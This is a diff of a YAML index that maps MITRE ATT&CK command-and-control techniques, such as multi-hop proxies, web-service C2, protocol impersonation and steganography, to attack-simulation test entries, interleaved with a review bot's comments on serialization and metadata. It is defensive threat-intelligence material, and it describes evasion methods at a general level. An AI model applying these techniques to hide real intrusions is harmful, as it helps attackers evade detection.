x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090:
technique:
@@ -44656,7 +45125,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T19:16:11.648Z'
name: Proxy
description: |-
Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -44676,8 +45145,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1568:
technique:
@@ -44715,7 +45182,7 @@ command-and-control:
url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:26:23.782Z'
name: Dynamic Resolution
description: |-
Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -44743,42 +45210,22 @@ command-and-control:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1102:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Anastasios Pingios
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
- type: attack-pattern
- created: '2017-05-31T21:31:13.915Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1102
- url: https://attack.mitre.org/techniques/T1102
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-07T17:53:54.380Z'
name: Web Service
description: |-
- Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+ Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - Anastasios Pingios
+ - Sarathkumar Rajendran, Microsoft Defender365
+ x_mitre_deprecated: false
x_mitre_detection: 'Host data that can relate unknown or suspicious process
activity using a network connection is important to supplement any existing
indicators of compromise based on malware command and control signatures and
@@ -44787,17 +45234,39 @@ command-and-control:
for uncommon data flows (e.g., a client sending significantly more data than
it receives from a server). User behavior monitoring may help to detect abnormal
patterns of activity.(Citation: University of Birmingham C2)'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+ created: '2017-05-31T21:31:13.915Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1102
+ external_id: T1102
+ - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+ description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+ Graph API for C&C communication. Retrieved July 1, 2024.
+ url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1568.003:
technique:
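Review bot: In the re-ordered T1102 object, `x_mitre_permissions_required: - User` is deleted and nothing in the new key block (`x_mitre_domains`, `x_mitre_is_subtechnique`, `x_mitre_platforms`, `x_mitre_version`, `type`, `id`, `created`, `created_by_ref`, `revoked`, `external_references`, `object_marking_refs`) re-adds it, whereas other objects in this diff (T1568, T1205.001, T1102.003, T1102.002) keep that key. If the upstream bundle dropped the field for T1102 that is fine, but confirm it was not lost during reordering. The rest of the hunk is consistent: the new "Broadcom BirdyClient Microsoft Graph API 2024" reference is cited in the updated description, `x_mitre_version` moves 1.1 to 1.2, and the new contributor is listed.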
@@ -44829,7 +45298,7 @@ command-and-control:
description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
Operations. Retrieved March 6, 2017.
url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T20:54:28.287Z'
name: DNS Calculation
description: |-
Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
@@ -44846,8 +45315,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1104:
technique:
@@ -44867,7 +45334,7 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1104
external_id: T1104
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:43:38.181Z'
name: Multi-Stage Channels
description: |-
Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -44890,8 +45357,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1205.001:
technique:
@@ -44916,7 +45381,7 @@ command-and-control:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -44941,8 +45406,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.002:
technique:
@@ -45007,7 +45470,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1102.003:
technique:
@@ -45031,7 +45493,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:26:10.109Z'
name: One-Way Communication
description: |-
Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -45056,21 +45518,36 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.003:
technique:
- modified: '2024-04-19T13:24:36.872Z'
+ modified: '2024-09-25T20:48:24.411Z'
name: 'Proxy: Multi-hop Proxy'
- description: |-
- Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
- For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
- In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.
-
- Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+ description: "Adversaries may chain together multiple proxies to disguise the
+ source of malicious traffic. Typically, a defender will be able to identify
+ the last proxy traffic traversed before it enters their network; the defender
+ may or may not be able to identify any previous proxies before the last-hop
+ proxy. This technique makes identifying the original source of the malicious
+ traffic even more difficult by requiring the defender to trace malicious traffic
+ through several proxies to identify its source.\n\nFor example, adversaries
+ may construct or use onion routing networks – such as the publicly available
+ [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+ C2 traffic through a compromised population, allowing communication with any
+ device within the network.(Citation: Onion Routing) Adversaries may also use
+ operational relay box (ORB) networks composed of virtual private servers (VPS),
+ Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+ obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+ infrastructure, it is possible for an adversary to leverage multiple compromised
+ devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+ By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+ on routers, adversaries can add custom code to the affected network devices
+ that will implement onion routing between those nodes. This method is dependent
+ upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+ method allowing the adversaries to cross the protected network boundary of
+ the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+ \ Protocols such as ICMP may be used as a transport. \n\nSimilarly, adversaries
+ may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+ routing between a decentralized network of peers.(Citation: NGLite Trojan)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
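Review bot: The T1090.003 description is re-serialized from a `|-` block scalar into a wrapped double-quoted scalar with `\n\n` escapes, which makes future diffs of this paragraph much harder to read and introduces the `\ ` escape at the start of the line beginning "\ Protocols such as ICMP", preserving a double space after "(WAN)." and a trailing space after "transport." from upstream. If the generator offers a choice, keep the block-scalar style used by the neighbouring objects (T1568.001, T1205, T1090, T1104, T1102.003) so the only visible change is the added ORB sentence. The added sentence itself is fine: it cites "ORB Mandiant", which is introduced in the external_references hunk below, and the object's `x_mitre_version` is bumped 2.1 to 2.2.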
@@ -45089,7 +45566,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.1'
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -45103,6 +45580,11 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1090/003
external_id: T1090.003
+ - source_name: ORB Mandiant
+ description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+ Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+ July 8, 2024.
+ url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
- source_name: NGLite Trojan
description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -45116,7 +45598,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.003
atomic_tests:
- name: Tor Proxy Usage - Debian/Ubuntu/FreeBSD
@@ -45149,7 +45630,7 @@ command-and-control:
elevation_required: true
T1001:
technique:
- modified: '2024-02-02T19:04:35.389Z'
+ modified: '2024-10-07T15:07:47.232Z'
name: Data Obfuscation
description: 'Adversaries may obfuscate command and control traffic to make
it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -45199,11 +45680,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1571:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:37:57.868Z'
name: Non-Standard Port
description: |-
Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -45212,20 +45692,20 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze packet contents to detect communications that do
not follow the expected protocol behavior for the port that is being used.
Analyze network data for uncommon data flows (e.g., a client sending significantly
more data than it receives from a server). Processes utilizing the network
that do not normally have network communication or have never been seen before
are suspicious.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
@@ -45250,17 +45730,16 @@ command-and-control:
url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
- source_name: Fortinet Agent Tesla April 2018
description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
Variant. Retrieved November 5, 2018.
url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1571
atomic_tests:
- name: Testing usage of uncommonly used port
@@ -45349,7 +45828,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1573
atomic_tests: []
T1102.002:
@@ -45374,7 +45852,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:15:47.861Z'
name: Bidirectional Communication
description: "Adversaries may use an existing, legitimate external Web service
as a means for sending commands to and receiving output from a compromised
@@ -45411,8 +45889,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1573.002:
technique:
@@ -45466,7 +45942,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1095:
technique:
@@ -45538,33 +46013,12 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1095
atomic_tests: []
T1001.003:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
- type: attack-pattern
- created: '2020-03-15T00:40:27.503Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1001.003
- url: https://attack.mitre.org/techniques/T1001/003
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
- name: Protocol Impersonation
+ modified: '2024-10-09T15:40:19.436Z'
+ name: Protocol or Service Impersonation
description: "Adversaries may impersonate legitimate protocols or web service
traffic to disguise command and control activity and thwart analysis efforts.
By impersonating legitimate protocols or web services, adversaries can make
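Review bot: most of this hunk is key reordering rather than a content change: `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` for T1001.003 are deleted here only to be re-added lower in the object in a different order, which buries the real change, the rename to `Protocol or Service Impersonation` with a new `modified` date. Consider having the generator serialize keys in a fixed (for example sorted) order so that future regenerations produce minimal diffs.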
@@ -45572,23 +46026,61 @@ command-and-control:
\ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
like subsequent traffic is SSL/TLS encrypted, potentially interfering with
some security tooling, or to make the traffic look like it is related with
- a trusted entity. "
+ a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+ impersonate expected web traffic or trusted services. For example, adversaries
+ may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+ data to disguise C2 communications or mimic legitimate services such as Gmail,
+ Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+ Malleable-C2-U42)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - James Emery-Callcott, Emerging Threats Team, Proofpoint
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+ created: '2020-03-15T00:40:27.503Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1001/003
+ external_id: T1001.003
+ - source_name: Malleable-C2-U42
+ description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+ Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+ How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+ September 24, 2024.'
+ url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ - source_name: ESET Okrum July 2019
+ description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+ RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1090.004:
technique:
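Review bot: the rename from `Protocol Impersonation` to `Protocol or Service Impersonation` together with `x_mitre_version` going from `'1.0'` to `'2.0'` changes the value that the index CSVs carry in their `Technique Name` column. T1001.003 has `atomic_tests: []`, so no CSV row is affected in this patch, but any test metadata or docs that still use the old name should be grepped for. The two citations added to the description (`ESET Okrum July 2019` and `Malleable-C2-U42`) both have matching `external_references` entries, so the description resolves cleanly.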
@@ -45635,7 +46127,6 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1132:
technique:
@@ -45695,7 +46186,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.002:
technique:
@@ -45727,7 +46217,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-14T23:39:50.117Z'
name: Non-Standard Encoding
description: 'Adversaries may encode data with a non-standard data encoding
system to make the content of command and control traffic more difficult to
@@ -45753,8 +46243,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.001:
technique:
@@ -45821,7 +46309,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.001
atomic_tests:
- name: Malicious User Agents - Nix
@@ -45939,7 +46426,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1105
atomic_tests:
- name: rsync remote file copy (push)
@@ -46303,7 +46789,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1001.002:
technique:
@@ -46327,7 +46812,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-15T00:37:58.963Z'
name: Data Obfuscation via Steganography
description: 'Adversaries may use steganographic techniques to hide command
and control traffic to make detection efforts more difficult. Steganographic
@@ -46350,8 +46835,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1001.002
atomic_tests:
- name: Execute Embedded Script in Image via Steganography
@@ -46404,7 +46887,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:49:47.340Z'
name: Fallback Channels
description: Adversaries may use fallback or alternate communication channels
if the primary channel is compromised or inaccessible in order to maintain
@@ -46424,8 +46907,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.001:
technique:
@@ -46479,7 +46960,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.001
atomic_tests:
- name: Connection Proxy
@@ -46552,7 +47032,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:12:30.499Z'
name: Dead Drop Resolver
description: |-
Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -46578,8 +47058,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1001.001:
technique:
@@ -46633,7 +47111,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
collection:
T1560.001:
@@ -46709,7 +47186,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1560.001
atomic_tests:
- name: Data Compressed - nix - zip
@@ -46952,7 +47428,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1113
atomic_tests:
- name: X Windows Capture
@@ -47181,7 +47656,6 @@ collection:
